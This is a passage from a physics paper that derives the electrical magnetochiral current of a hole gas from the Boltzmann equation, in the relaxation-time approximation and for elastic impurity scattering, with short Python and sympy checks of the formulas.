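for eps in (0.05, 0.2, 1.0):
    assert np.isclose(eps0(kappa(eps)), eps)

# ... and the numerical minimum agrees with eps_m = -Delta^2 * A1 / beta^2.
kz = np.linspace(-3.0, 3.0, 200001)
assert np.isclose(eps0(kz).min(), -Delta**2 * A1 / beta**2)
print("checks passed")
```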
A sum of any function \(\mathcal{F}(k_{z},\varepsilon^{0}_{\mathbf{k}})\) over \(\mathbf{k}\) is calculated as follows \[\sum_{\mathbf{k}}\mathcal{F}(k_{z},\varepsilon^{0}_{\mathbf{k}})=g_{2D}\int\limits_{\varepsilon_{m}}^{\infty}\!\mathrm{d}\varepsilon^{0}_{\mathbf{k}}\int\limits_{K_{z}(\varepsilon^{0}_{\mathbf{k}})}\mathrm{d}k_{z}\mathcal{F}(k_{z},\varepsilon^{0}_{\mathbf{k}})\,, \tag{10}\] where \(g_{2D}=1/(8\pi^{2}\mathcal{A}_{2})\) is the density of states for two-dimensional motion in the \((xy)\) plane. In the following we consider the case where the energy minimum \(\varepsilon_{m}\) is small compared with the average hole energy and use the limits \([-\kappa(\varepsilon_{\mathbf{k}}),\kappa(\varepsilon_{\mathbf{k}})]\) and \((0,\infty)\) of integration over \(k_{z}\) and \(\varepsilon^{0}_{\mathbf{k}}\) in equations like Eq. (10). The distribution function obeys the Boltzmann kinetic equation \[\frac{e}{\hbar}\mathbf{E}\cdot\frac{\partial f_{\mathbf{k}}}{\partial\mathbf{k}}+\hat{\mathcal{I}}^{(\mathrm{el})}_{\mathbf{k}}[f]+\hat{\mathcal{I}}^{(\mathrm{inel})}_{\mathbf{k}}[f]=0\,, \tag{11}\] where the left-hand side contains the force and collision terms respectively. The collision integral consists of two contributions describing elastic and inelastic hole scattering. We will solve Eq. (11) by iterations up to the second order in \(\mathbf{E}\) and, therefore, present \(f_{\mathbf{k}}\) as a sum \(f_{0}(\varepsilon_{\mathbf{k}})+f_{1}(\mathbf{k})+f_{2}(\mathbf{k})\) with \(f_{0}(\varepsilon_{\mathbf{k}})\) being the Fermi-Dirac distribution and \(f_{n}\propto E^{n}\). ## IV Relaxation time approximation We use the relaxation-time approximation taking the collision integral in the form \[\hat{\mathcal{I}}_{\mathbf{k}}[f]=\frac{f_{\mathbf{k}}-f_{0}(\varepsilon_{\mathbf{k}})}{\tau} \tag{12}\] with \(\tau\) being a constant. This corresponds to fast energy relaxation with a rate equal to the elastic scattering rate. Then the corrections of the first and second orders in \(E_{z}\) are given by \[f_{1}(\mathbf{k}) = -e\tau E_{z}f^{\prime}_{0}(\varepsilon_{\mathbf{k}})v_{z}\,, \tag{13}\] \[f_{2}(\mathbf{k}) = -\frac{e\tau E_{z}}{\hbar}\frac{\partial f_{1}(\mathbf{k})}{\partial k_{z}}\,,\] where \(f^{\prime}_{0}(\varepsilon)=\partial f_{0}(\varepsilon)/\partial\varepsilon\). Substitution of \(f_{\mathbf{k}}=f_{2}(\mathbf{k})\) into Eq. (9) and integration by parts yields for the eMCh current density \[\delta j_{z}=2\frac{e^{3}(\tau E_{z})^{2}}{\hbar^{3}}\sum_{\mathbf{k}}f_{0}(\varepsilon_{\mathbf{k}})\frac{\partial^{3}\varepsilon_{\mathbf{k}}}{\partial k_{z}^{3}}\,. \tag{14}\] An analogous result was obtained previously for 1D transport in quantum wires [20]. Expanding \[f_{0}(\varepsilon^{0}_{\mathbf{k}}+\delta\varepsilon_{\mathbf{k}})\approx f_{0}(\varepsilon^{0}_{\mathbf{k}})+f^{\prime}_{0}(\varepsilon^{0}_{\mathbf{k}})\delta\varepsilon_{\mathbf{k}}\;, \tag{15}\]
calculating the third derivatives of \(\varepsilon_{\mathbf{k}}^{0}\) and \(\delta\varepsilon_{\mathbf{k}}\) and integrating by parts we obtain \[G_{zzzz}=-12\frac{e^{3}\tau^{2}\mathcal{A}_{1}g\beta}{\hbar^{3}\Delta_{2}}\sum_{\mathbf{k}}\eta^{2}(k_{z})\zeta^{3}(k_{z})f_{0}^{\prime}(\varepsilon_{\mathbf{k}}^{0})\:, \tag{16}\] where \[\zeta(k_{z})=\frac{\Delta_{2}}{\sqrt{\Delta_{2}^{2}+\beta^{2}k_{z}^{2}}}=\sqrt{1-\eta^{2}(k_{z})}. \tag{17}\] For a degenerate hole gas with the Fermi energy \(\varepsilon_{F}>0\) we come to the final equation \[G_{zzzz}=g\frac{\mathcal{A}_{1}}{\mathcal{A}_{2}}\frac{e^{3}\tau^{2}}{\pi^{2}\hbar^{3}}\eta^{3}(\kappa_{\text{F}})\:, \tag{18}\] where \(\kappa_{\text{F}}=\kappa(\varepsilon_{\text{F}})\) and \(\kappa(\varepsilon)\) is defined by Eq. (8). An important result to stress is that, at small \(\beta\), the eMCh current is not a linear but a cubic function of \(\beta\). This can be understood by taking \(\varepsilon_{\mathbf{k}}^{0}\) as \(\mathcal{A}_{1}k_{z}^{2}+\mathcal{A}_{2}k_{\perp}^{2}\) and the magnetic-field induced correction to the energy as \(\delta\varepsilon=Pk_{z}\), where \(P=-gB_{z}\beta/\Delta_{2}\), and shifting the origin of the \(\mathbf{k}\)-space by \(k_{z}^{0}=P/(2\mathcal{A}_{1})\). In the new frame \(k_{z}^{\prime}=k_{z}+k_{z}^{0}\) we obtain, up to a constant energy shift, a fully parabolic dispersion \(\varepsilon_{\mathbf{k}^{\prime}}=\mathcal{A}_{1}k_{z}^{\prime 2}+\mathcal{A}_{2}k_{\perp}^{2}\) as in a centrosymmetric crystal where an eMCh current is forbidden. A similar calculation of the \(G_{xxxx}\) component with the following energy dispersion in the magnetic field \(\mathbf{B}\parallel x\) \[\varepsilon_{\mathbf{k}}=\varepsilon_{\mathbf{k}}^{0}+B_{x}k_{x}(\Xi_{\perp}k_{\perp}^{2}+\Xi_{z}k_{z}^{2})\:, \tag{19}\] yields \[G_{xxxx}=2\frac{\mathcal{A}_{1}}{\mathcal{A}_{2}}\frac{e^{3}\tau^{2}}{\pi^{2}\hbar^{3}}\Xi_{\perp}k_{\text{F}}^{3}. \tag{20}\] Since the presence of a linear-\(k_{x}\) term is not enough to get the magnetochiral current, we took into account cubic-\(\mathbf{k}\) terms in Eq. (19). Note, however, that \(\Xi_{z}\) makes no contribution to the eMCh current because the third derivative \(\partial^{3}(k_{x}k_{z}^{2})/\partial k_{x}^{3}=0\), see Eq. (14). ### Microscopic interpretation of eMChA We give here the simplest interpretation of the eMChA current (14). In the external electric field \(E_{z}\) the equilibrium hole distribution is shifted in the \(\mathbf{k}\)-space by \(\delta k_{z}=eE_{z}\tau/\hbar\). Then in the simplest description one can present the nonequilibrium distribution function as \(f_{0}(\mathbf{k}_{\perp},k_{z}-\delta k_{z})\). Let us expand this function in powers of \(\delta k_{z}\) as follows \[f_{0}(\mathbf{k}_{\perp},k_{z}-\delta k_{z})=f_{0}(\mathbf{k})-\frac{\partial f_{0}}{\partial k_{z}}\delta k_{z}+\frac{1}{2}\frac{\partial^{2}f_{0}}{\partial k_{z}^{2}}(\delta k_{z})^{2}\:.\] The linear term contributes to the Ohmic current while the nonlinear contribution is \[\delta j_{z}=e\sum_{\mathbf{k}}v_{z}\frac{\partial^{2}f_{0}}{\partial k_{z}^{2}}(\delta k_{z})^{2}=\frac{e^{3}\tau^{2}E_{z}^{2}}{\hbar^{3}}\sum_{\mathbf{k}}\frac{\partial^{3}\varepsilon_{\mathbf{k}}}{\partial k_{z}^{3}}f_{0}(\varepsilon_{\mathbf{k}})\:.\] This equation differs from Eq. (14) only by a factor of 2, which reflects the simplified character of the latter consideration. ## V Mechanism due to elastic scattering Now we consider the eMCh current formed in the process of elastic scattering by short-range impurities. 
In this case the collision integral reads \[\hat{\mathcal{I}}_{\mathbf{k}}^{(\text{el})}[f]=\frac{2\pi}{\hbar}\mathcal{N}_{i} \sum_{\mathbf{k}^{\prime}}|V_{\mathbf{k}^{\prime}\mathbf{k}}|^{2}\delta(\varepsilon_{\mathbf{ k}}-\varepsilon_{\mathbf{k}^{\prime}})(f_{\mathbf{k}}-f_{\mathbf{k}^{\prime}}), \tag{21}\] where \(\mathcal{N}_{i}\) is the impurity concentration, and \(V_{\mathbf{k}^{\prime}\mathbf{k}}\) is the matrix element of scattering by an individual impurity potential \(V(\mathbf{r})=V_{0}\delta(\mathbf{r})\) given by \(V_{\mathbf{k}^{\prime}\mathbf{k}}=V_{0}\left\langle u_{k_{z}^{\prime}}\middle|u_{k_{z} }\right\rangle\), with \(u_{k_{z}}\) being the eigenvectors of the Hamiltonian (3). For the mechanism under consideration all the nonequilibrium corrections to the distribution function \(f_{\mathbf{k}}\) vanish after averaging over \(\mathbf{k}\) at the fixed energy. The role of corrections \(\delta f\) dependent on the energy \(\varepsilon_{\mathbf{k}}\) is analyzed in Sect. VII. ### Inversion of the collision integral at \(\mathbf{B}=\mathbf{0}\) At \(\mathbf{B}=0\) we obtain from Eq. (7): \[|V_{\mathbf{k}^{\prime}\mathbf{k}}|^{2}=\frac{V_{0}^{2}}{2}[1+\eta(k_{z})\eta(k_{z}^{ \prime})+\zeta(k_{z})\zeta(k_{z}^{\prime})]. \tag{22}\] Below we use for brevity the notation \(\mathcal{I}_{\mathbf{k}}[f]\) instead of \(\mathcal{I}_{\mathbf{k}}^{(\text{el})}[f]\) for the elastic collision integral at \(\mathbf{B}=0\). It follows from Eq. (22) that, for the short-range scattering potential, the kernel of the elastic collision integral (21) is degenerate: It is a sum of products of functions depending solely on \(k_{z}\) or \(k_{z}^{\prime}\). This allows us to invert the operator \(\hat{\mathcal{I}}_{\mathbf{k}}[f]\) by reducing the following integral equation to the algebraic one \[G(k_{z},\varepsilon_{\mathbf{k}}^{0})+\hat{\mathcal{I}}_{\mathbf{k}}[f]=0\:, \tag{23}\] where the source function \(G(k_{z},\varepsilon_{\mathbf{k}}^{0})\) satisfies the integral condition \[\sum_{\mathbf{k}}G(k_{z},\varepsilon_{\mathbf{k}}^{0})\delta(\varepsilon_{\mathbf{k}}^{0}- \varepsilon)\propto\int\limits_{-\kappa(\varepsilon)}^{\kappa(\varepsilon)} \mathrm{d}k_{z}G(k_{z},\varepsilon)=0\:, \tag{24}\] which means that the number of particles of a given energy are conserved under elastic scattering. If the source function \(G(k_{z},\varepsilon_{\mathbf{k}}^{0})\) in the kinetic equation (23) does not satisfy the condition (24) it should be presented as a sum of the function satisfying this condition and the function \(G(\varepsilon_{\mathbf{k}}^{0})\) dependent purely on \(\varepsilon_{\mathbf{k}}^{0}\). In order to find the solution of the kinetic equation with the source \(G(\varepsilon_{\mathbf{k}}^{0})\) one must replace \(\hat{\mathcal{I}}_{\mathbf{k}}[f]\) in Eq. (23) by the inelastic collision integral \(\hat{\mathcal{I}}_{\mathbf{k}}^{(\text{inel})}[f]\), see Section VII. 
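The role of the degenerate kernel and of condition (24) can be made concrete with a small self-contained numerical sketch. The three kernel components and the source below are arbitrary smooth test functions that merely mimic the three-term structure of Eq. (22); they are not the actual matrix element.

```python
import numpy as np

# Toy illustration: for a separable ("degenerate") kernel
#     K(k, k') = sum_n a_n(k) a_n(k'),
# the integral equation  G(k) + ∫ dk' K(k,k') [f(k) - f(k')] = 0
# reduces to a small linear system for the moments c_n = ∫ dk' a_n(k') f(k').
k = np.linspace(-1.0, 1.0, 2001)
dk = k[1] - k[0]

a = np.array([np.ones_like(k),            # mimics the "1" term of Eq. (22)
              k / np.sqrt(1 + k**2),      # odd, eta-like
              1 / np.sqrt(1 + k**2)])     # even, zeta-like
K = a.T @ a                               # separable kernel on the grid
A = K.sum(axis=1) * dk                    # A(k) = ∫ dk' K(k, k')

G = k**3 - 0.2 * k                        # odd source: discrete ∫ G dk = 0, the analogue of (24)

# f(k) = [sum_n a_n(k) c_n - G(k)] / A(k), with  (I - M) c = -b,
# M_mn = ∫ dk a_m a_n / A,  b_m = ∫ dk a_m G / A.
M = (a / A) @ a.T * dk
b = (a / A) @ G * dk
c, *_ = np.linalg.lstsq(np.eye(len(a)) - M, -b, rcond=None)   # system is singular (f defined up to a constant)

f = (a.T @ c - G) / A
residual = G + f * A - K @ f * dk
print(np.max(np.abs(residual)))           # numerically zero: f solves the integral equation
```

The linear system is solvable only when the discrete analogue of condition (24), \(\int G\,\mathrm{d}k=0\), holds; the explicit inversion formulas (25)–(28) below are the closed-form counterpart of this construction.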
For an odd source term, \(G(k_{z},\varepsilon_{\mathbf{k}}^{0})=-G(-k_{z},\varepsilon_{\mathbf{k}}^{0})\), we obtain for the inverse operator \[\hat{\mathcal{I}}_{\mathbf{k}}^{-1}[G]=\frac{\hbar[G(k_{z},\varepsilon_{\mathbf{k}}^{0} )+\eta(k_{z})L_{G\eta}/\big{(}1-L_{\eta^{2}}\big{)}]}{2\pi g_{2D}\mathcal{N}_{i }V_{0}^{2}C(k_{z},\varepsilon_{\mathbf{k}}^{0})}\:, \tag{25}\] and for an even function \(G(k_{z},\varepsilon_{\mathbf{k}}^{0})=G(-k_{z},\varepsilon_{\mathbf{k}}^{0})\) we have \[\hat{\mathcal{I}}_{\mathbf{k}}^{-1}[G]=\frac{\hbar[G(k_{z},\varepsilon_{\mathbf{k}}^{0 })-\zeta(k_{z})L_{G}/L_{\zeta}]}{2\pi g_{2D}\mathcal{N}_{i}V_{0}^{2}C(k_{z}, \varepsilon_{\mathbf{k}}^{0})}\:, \tag{26}\] \[C(k_{z},\varepsilon_{\mathbf{k}}^{0})=\kappa(\varepsilon_{\mathbf{k}}^{0})+\frac{ \Delta_{2}}{\beta}\zeta(k_{z})\operatorname{Arctanh}\big{\{}\eta[\kappa( \varepsilon_{\mathbf{k}}^{0})]\big{\}}\:, \tag{27}\] where \(\operatorname{Arctanh}(z)=[\ln(1+z)-\ln(1-z)]/2\), and the function \(L_{F}(\varepsilon_{\mathbf{k}}^{0})\) is defined for any even-\(k_{z}\) function \(F(k_{z},\varepsilon_{\mathbf{k}}^{0})\) as follows \[L_{F}(\varepsilon_{\mathbf{k}}^{0})=\int\limits_{0}^{\kappa(\varepsilon_{\mathbf{k}}^ {0})}\mathrm{d}k_{z}\frac{F(k_{z},\varepsilon_{\mathbf{k}}^{0})}{C(k_{z},\varepsilon _{\mathbf{k}}^{0})}\:. \tag{28}\] By using the inverse collision integral we can calculate the conductivity \[\sigma_{zz}=2e\sum_{\mathbf{k}}v_{z}^{0}(\mathbf{k})\hat{\mathcal{I}}_{\mathbf{k}}^{-1} \big{[}-ev_{z}^{0}f_{0}^{\prime}\big{]}\:, \tag{29}\] where \(v_{z}^{0}=\hbar^{-1}\partial\varepsilon_{\mathbf{k}}^{0}/\partial k_{z}\) is the hole velocity in the absence of magnetic field. For degenerate hole statistics we have \[\sigma_{zz}=\frac{2e^{2}\hbar}{\pi\mathcal{N}_{i}V_{0}^{2}}\Bigg{(}L_{v^{2}}+ \frac{L_{v\eta}^{2}}{1-L_{\eta^{2}}}\Bigg{)}\:, \tag{30}\] where the functions \(L_{F}\) are taken at \(\varepsilon_{\mathbf{k}}^{0}=\varepsilon_{\text{F}}\). ### Allowance for linear-B term in collision integral Scattering by impurities is affected by the magnetic field. In the linear-\(\mathbf{B}\) approximation we obtain \[\delta\hat{\mathcal{I}}_{\mathbf{k}}[f]= \frac{2\pi}{\hbar}\mathcal{N}_{i}\sum_{\mathbf{k}^{\prime}}\biggl{[} \delta|V_{\mathbf{k}^{\prime}\mathbf{k}}|^{2}\delta\big{(}\varepsilon_{\mathbf{k}}^{0}- \varepsilon_{\mathbf{k}^{\prime}}^{0}\big{)} \tag{31}\] \[+|V_{\mathbf{k}^{\prime}\mathbf{k}}|^{2}\delta^{\prime}\big{(}\varepsilon_ {\mathbf{k}}^{0}-\varepsilon_{\mathbf{k}^{\prime}}^{0}\big{)}(\delta\varepsilon_{\mathbf{ k}}-\delta\varepsilon_{\mathbf{k}^{\prime}})\biggr{]}(f_{\mathbf{k}}-f_{\mathbf{k}^{ \prime}}).\] Here \(\delta\varepsilon_{\mathbf{k}}\) is given by Eq. 
(6), and, since the Hamiltonian (3) in the presence of \(B_{z}\) is obtained from its zero-field value by the sustitution \(k_{z}\to k_{z}+gB_{z}/\beta\), we have \[\delta|V_{\mathbf{k}^{\prime}\mathbf{k}}|^{2}=\frac{gB_{z}}{\beta}\bigg{(}\frac{ \partial}{\partial k_{z}}+\frac{\partial}{\partial k_{z}^{\prime}}\bigg{)}|V_{ \mathbf{k}^{\prime}\mathbf{k}}|^{2}, \tag{32}\] which yields \[\delta|V_{\mathbf{k}^{\prime}\mathbf{k}}|^{2}=V_{0}^{2}\frac{gB_{z}}{2 \Delta_{2}} \tag{33}\] \[\times\bigl{[}\eta^{2}(k_{z}^{\prime})-\eta^{2}(k_{z})\bigr{]} \bigl{[}\eta(k_{z}^{\prime})\zeta(k_{z})-\eta(k_{z})\zeta(k_{z}^{\prime}) \bigr{]}\:.\] Passing from summation to integration over the variables \((k_{z}^{\prime},\varepsilon_{\mathbf{k}^{\prime}}^{0})\) and integrating the term with \[\delta^{\prime}(\varepsilon_{\mathbf{k}}^{0}-\varepsilon_{\mathbf{k}^{\prime}}^{0})=- \frac{\partial\delta(\varepsilon_{\mathbf{k}}^{0}-\varepsilon_{\mathbf{k}^{\prime}}^{0}) }{\partial\varepsilon_{\mathbf{k}^{\prime}}^{0}}\] by parts, we get \[\delta\hat{\mathcal{I}}_{\mathbf{k}}[f]=\frac{2\pi}{\hbar}\mathcal{N}_{i }g_{2D}\] \[\times\Bigg{\{}\int\limits_{-\kappa(\varepsilon_{\mathbf{k}}^{0})}^{ \kappa(\varepsilon_{\mathbf{k}}^{0})}\mathrm{d}k_{z}^{\prime}\delta|V_{\mathbf{k}^{ \prime}\mathbf{k}}|^{2}\bigl{[}f(\varepsilon_{\mathbf{k}}^{0},k_{z})-f(\varepsilon_{ \mathbf{k}}^{0},k_{z}^{\prime})\bigr{]}\] \[\quad+f_{\mathbf{k}}\frac{\mathrm{d}}{\mathrm{d}\varepsilon_{\mathbf{k}}^{0 }}\int\limits_{-\kappa(\varepsilon_{\mathbf{k}}^{0})}^{\kappa(\varepsilon_{\mathbf{k}}^{0 })}\mathrm{d}k_{z}^{\prime}|V_{\mathbf{k}^{\prime}\mathbf{k}}|^{2}(\delta\varepsilon_{ \mathbf{k}}-\delta\varepsilon_{\mathbf{k}^{\prime}})\] \[-\frac{\mathrm{d}}{\mathrm{d}\varepsilon_{\mathbf{k}}^{0}}\int\limits_ {-\kappa(\varepsilon_{\mathbf{k}}^{0})}^{\kappa(\varepsilon_{\mathbf{k}}^{0})}\mathrm{d}k _{z}^{\prime}|V_{\mathbf{k}^{\prime}\mathbf{k}}|^{2}(\delta\varepsilon_{\mathbf{k}}-\delta \varepsilon_{\mathbf{k}^{\prime}})f(\varepsilon_{\mathbf{k}}^{0},k_{z}^{\prime})\Bigg{\}}. \tag{34}\] Here we took into account that both \(|V_{\mathbf{k}^{\prime}\mathbf{k}}|^{2}\) and \(\delta\varepsilon_{\mathbf{k}}\) are independent of \(\varepsilon_{\mathbf{k}}^{0}\) and dependent on \(k_{z},k_{z}^{\prime}\) only. ### Procedure to calculate the eMCh current According to Eq. (31) or (34), at nonzero magnetic field the kinetic equation takes the form \[\frac{e}{\hbar}E_{z}\frac{\partial f_{\mathbf{k}}}{\partial k_{z}}+\hat{\mathcal{I}}_{ \mathbf{k}}[f]+\delta\hat{\mathcal{I}}_{\mathbf{k}}[f]=0\:. \tag{35}\] The equilibrium hole gas is described by the Fermi-Dirac distribution function (15) satisfying the identity \[\delta\hat{\mathcal{I}}_{\mathbf{k}}\bigl{[}f_{0}(\varepsilon_{\mathbf{k}}^{0})\bigr{]} +\hat{\mathcal{I}}_{\mathbf{k}}\bigl{[}f_{0}^{\prime}(\varepsilon_{\mathbf{k}}^{0}) \delta\varepsilon_{\mathbf{k}}\bigr{]}=0\:, \tag{36}\] which is Eq. (35) at \(E_{z}=0\). The correction to the distribution function proportional to \(E_{z}^{2}B_{z}\) can be found by iterations of the kinetic equation (35). First of all, we find a linear-\(E_{z}\) correction \(f_{\mathbf{k}}^{(E)}\) at \(B_{z}=0\). It is given by \(f_{\mathbf{k}}^{(E)}=-eE_{z}\hat{\mathcal{I}}_{\mathbf{k}}^{-1}[v_{z}f_{0}^{\prime}]\), see Eq. (29). The required solution \(\delta f_{\mathbf{k}}\propto E_{z}^{2}B_{z}\) is sought as a sum of two corrections labeled \(f_{\mathbf{k}}^{(E^{2}B)}\) and \(f_{\mathbf{k}}^{(EBE)}\). 
To calculate \(f_{\mathbf{k}}^{(E^{2}B)}\) we perform the next iteration and find the correction \(f_{\mathbf{k}}^{(E^{2})}\propto E_{z}^{2}\) at \(B_{z}=0\) from the equation \[\frac{eE_{z}}{\hbar}\Bigg{(}\frac{\partial f_{\mathbf{k}}^{(E)}}{\partial k_{z}}-\overline{\frac{\partial f_{\mathbf{k}}^{(E)}}{\partial k_{z}}}\Bigg{)}+\hat{\mathcal{I}}_{\mathbf{k}}\Big{[}f^{(E^{2})}\Big{]}=0\:. \tag{37}\] Here the bar denotes averaging over \(k_{z}\) at a fixed energy \(\varepsilon_{\mathbf{k}}^{0}\), namely, \[\overline{F}=\frac{1}{2\kappa(\varepsilon_{\mathbf{k}}^{0})}\int\limits_{-\kappa(\varepsilon_{\mathbf{k}}^{0})}^{\kappa(\varepsilon_{\mathbf{k}}^{0})}\mathrm{d}k_{z}F(k_{z},\varepsilon_{\mathbf{k}}^{0})\:. \tag{38}\] Then we include into consideration the magnetic field \(B_{z}\) and find \(f_{\mathbf{k}}^{(E^{2}B)}\) as a solution of the linear equation \[\delta\hat{\mathcal{I}}_{\mathbf{k}}\Big{[}f_{\mathbf{k}}^{(E^{2})}\Big{]}+\hat{\mathcal{I}}_{\mathbf{k}}\Big{[}f^{(E^{2}B)}\Big{]}=0\:. \tag{39}\] In order to determine the second contribution, \(f_{\mathbf{k}}^{(EBE)}\), we first find the correction \(f_{\mathbf{k}}^{(EB)}\propto E_{z}B_{z}\). It satisfies the equation \[\frac{e}{\hbar}E_{z}\Bigg{[}\frac{\partial(f_{0}^{\prime}\delta\varepsilon_{\mathbf{k}})}{\partial k_{z}}-\overline{\frac{\partial(f_{0}^{\prime}\delta\varepsilon_{\mathbf{k}})}{\partial k_{z}}}\Bigg{]} \tag{40}\] \[+ \delta\hat{\mathcal{I}}_{\mathbf{k}}\Big{[}f^{(E)}\Big{]}-\overline{\delta\hat{\mathcal{I}}_{\mathbf{k}}\big{[}f^{(E)}\big{]}}+\hat{\mathcal{I}}_{\mathbf{k}}\Big{[}f^{(EB)}\Big{]}=0\:.\] Finally we substitute the correction \(f_{\mathbf{k}}^{(EB)}\) into \[\frac{eE_{z}}{\hbar}\frac{\partial f_{\mathbf{k}}^{(EB)}}{\partial k_{z}}+\hat{\mathcal{I}}_{\mathbf{k}}\Big{[}f^{(EBE)}\Big{]}=0 \tag{41}\] and find \(f_{\mathbf{k}}^{(EBE)}\). It should be noted that both \(f_{\mathbf{k}}^{(E)}\) and the resulting functions \(f_{\mathbf{k}}^{(E^{2}B)},f_{\mathbf{k}}^{(EBE)}\) are odd in \(k_{z}\), whereas those obtained at intermediate iteration steps, \(f_{\mathbf{k}}^{(E^{2})}\) and \(f^{(EB)}\), are even functions of \(k_{z}\). For the mechanism due to elastic scattering all these functions satisfy the integral condition (24). The eMCh current is calculated according to Eq. (9) as follows \[\delta j_{z}=2e\sum_{\mathbf{k}}\Big{[}v_{z}^{0}\Big{(}f_{\mathbf{k}}^{(EBE)}+f_{\mathbf{k}}^{(E^{2}B)}\Big{)}+\delta v_{z}f_{\mathbf{k}}^{(E^{2})}\Big{]}. \tag{42}\] Here, following Eq. (4) we present the hole velocity as \(v_{z}=v_{z}^{0}+\delta v_{z}\) with \[v_{z}^{0}(k_{z})=\frac{1}{\hbar}\left[2\mathcal{A}_{1}k_{z}+\beta\eta(k_{z})\right]\:, \tag{43}\] \[\delta v_{z}(k_{z})=gB_{z}\frac{\beta}{\hbar\Delta_{2}}\zeta^{3}(k_{z})\:. \tag{44}\] ## VI The magnetochiral current in the small \(\beta\) limit At small \(\beta\), the equation (18) derived in the relaxation-time approximation reduces to \[G_{zzzz}\approx g\frac{\mathcal{A}_{1}}{\mathcal{A}_{2}}\frac{e^{3}\tau^{2}}{\pi^{2}\hbar^{3}}z^{3}\:, \tag{45}\] where \(z=\beta\kappa_{F}/\Delta_{2}\). Here we go beyond the relaxation-time approximation, apply the scheme developed in the previous Section and calculate each of the three contributions to the eMCh current (42) assuming the constant \(\beta\) to be small. 
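Before doing so, a quick consistency check of the iteration scheme may be useful. The following sympy sketch reproduces the small-\(\beta\) expression for \(f_{\mathbf{k}}^{(E^{2})}\) quoted in Eq. (51) below directly from Eq. (37), using the approximate inversion \(\hat{\mathcal{I}}_{\mathbf{k}}^{-1}[G]\approx-\tau G\) of Eq. (47); the test function \(g(\varepsilon)\), standing for \(\tau(\varepsilon)f_{0}^{\prime}(\varepsilon)\), is an arbitrary smooth placeholder.

```python
import sympy as sp

kz, kp2, A1, A2, e, Ez, hbar, eps0, T, tauE = sp.symbols(
    'k_z k_perp2 A_1 A_2 e E_z hbar epsilon_0 T tau_E', positive=True)

g = lambda x: sp.exp(-x / T)                  # arbitrary smooth stand-in for tau(eps)*f0'(eps)
eps = A1 * kz**2 + A2 * kp2                   # parabolic limit, Eq. (46)

fE = -e * Ez * (2 * A1 / hbar) * kz * g(eps)  # f^(E) = -e E_z tau v_z f0'
dfE = sp.diff(fE, kz)                         # force term, derivative at fixed k_perp
dfE = dfE.subs(kp2, (eps0 - A1 * kz**2) / A2) # re-express on the energy surface eps0

kappa = sp.sqrt(eps0 / A1)
bar = sp.integrate(dfE, (kz, -kappa, kappa)) / (2 * kappa)   # average of Eq. (38)

fE2 = -tauE * (e * Ez / hbar) * (dfE - bar)   # Eq. (37) with I^{-1}[G] = -tau(eps0) G

target = (2 * A1 * e * Ez / hbar)**2 * tauE * sp.diff(g(eps0), eps0) * (kz**2 - kappa**2 / 3)
print(sp.simplify(fE2 - target))              # -> 0, i.e. Eq. (51)
```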
In the limit \(\beta\to 0\), we have approximately \[C(k_{z},\varepsilon_{\mathbf{k}}^{0})\approx 2\kappa(\varepsilon_{\mathbf{k}}^{0})\:,\:\kappa(\varepsilon_{\mathbf{k}}^{0})\approx\sqrt{\frac{\varepsilon_{\mathbf{k}}^{0}}{\mathcal{A}_{1}}}\:,\:|V_{\mathbf{k^{\prime}}\mathbf{k}}|^{2}\approx V_{0}^{2}\:,\] \[\varepsilon_{\mathbf{k}}^{0}\approx\mathcal{A}_{1}k_{z}^{2}+\mathcal{A}_{2}k_{\perp}^{2}\:,\:\:\:\:\:\:v_{z}^{0}\approx\frac{2\mathcal{A}_{1}k_{z}}{\hbar}\:, \tag{46}\] and the inverted collision integral is given by \[\hat{\mathcal{I}}_{\mathbf{k}}^{-1}[G]\approx-\tau(\varepsilon_{\mathbf{k}}^{0})G(k_{z},\varepsilon_{\mathbf{k}}^{0})\:,\:\tau(\varepsilon_{\mathbf{k}}^{0})=\frac{2\pi\mathcal{A}_{2}\hbar}{\mathcal{N}_{i}V_{0}^{2}\kappa(\varepsilon_{\mathbf{k}}^{0})}\:. \tag{47}\] In the magnetic-field induced correction to the energy spectrum we take into account the cubic-\(\beta\) term because, as discussed above, the linear-\(\beta\) correction does not result in eMChA. Therefore we take \[\delta\varepsilon_{\mathbf{k}}\approx-\frac{gB_{z}}{2}\bigg{(}\frac{\beta k_{z}}{\Delta_{2}}\bigg{)}^{3},\quad\delta v_{z}\approx-\frac{3gB_{z}}{2\hbar}\bigg{(}\frac{\beta}{\Delta_{2}}\bigg{)}^{3}k_{z}^{2}. \tag{48}\] The \(B_{z}\)-linear correction to the scattering matrix element squared reads \[\delta|V_{\mathbf{k^{\prime}}\mathbf{k}}|^{2}\approx\frac{V_{0}^{2}}{2}\frac{gB_{z}}{\Delta_{2}}\bigg{(}\frac{\beta k_{z}}{\Delta_{2}}\bigg{)}^{3}\big{(}k_{z}^{\prime 2}-k_{z}^{2}\big{)}(k_{z}^{\prime}-k_{z}). \tag{49}\] It can be neglected in the following because its contribution to the current is parametrically smaller by a factor of \(\varepsilon_{\mathrm{F}}/\Delta_{2}\ll 1\) compared with other contributions coming from the \(B_{z}\)-linear correction (48). As a result, only the last two lines of Eq. (34) contribute to \(\delta\hat{\mathcal{I}}_{\mathbf{k}}[f]\): \[\delta\hat{\mathcal{I}}_{\mathbf{k}}[f]=\frac{1}{\kappa\tau}\Bigg{[}f_{\mathbf{k}}\delta\varepsilon_{\mathbf{k}}\frac{\mathrm{d}\kappa}{\mathrm{d}\varepsilon_{\mathbf{k}}^{0}}+\frac{1}{2}\int\limits_{-\kappa(\varepsilon_{\mathbf{k}}^{0})}^{\kappa(\varepsilon_{\mathbf{k}}^{0})}\mathrm{d}k_{z}^{\prime}\delta\varepsilon_{\mathbf{k^{\prime}}}\frac{\partial f(\varepsilon_{\mathbf{k}}^{0},k_{z}^{\prime})}{\partial\varepsilon_{\mathbf{k}}^{0}}\Bigg{]}\:. \tag{50}\] We start with the calculation of the third term in the right-hand side of Eq. (42). The correction \(f_{\mathbf{k}}^{(E^{2})}\) found from Eq. (37) with \(f_{\mathbf{k}}^{(E)}=-eE_{z}\tau v_{z}f_{0}^{\prime}\) is given by \[f_{\mathbf{k}}^{(E^{2})}=\bigg{(}2\mathcal{A}_{1}\frac{eE_{z}}{\hbar}\bigg{)}^{2}\tau(\tau f_{0}^{\prime})^{\prime}\bigg{(}k_{z}^{2}-\frac{\kappa^{2}}{3}\bigg{)}. \tag{51}\] Substituting this function into the last term in Eq. (42) we find its contribution to the eMChA effect 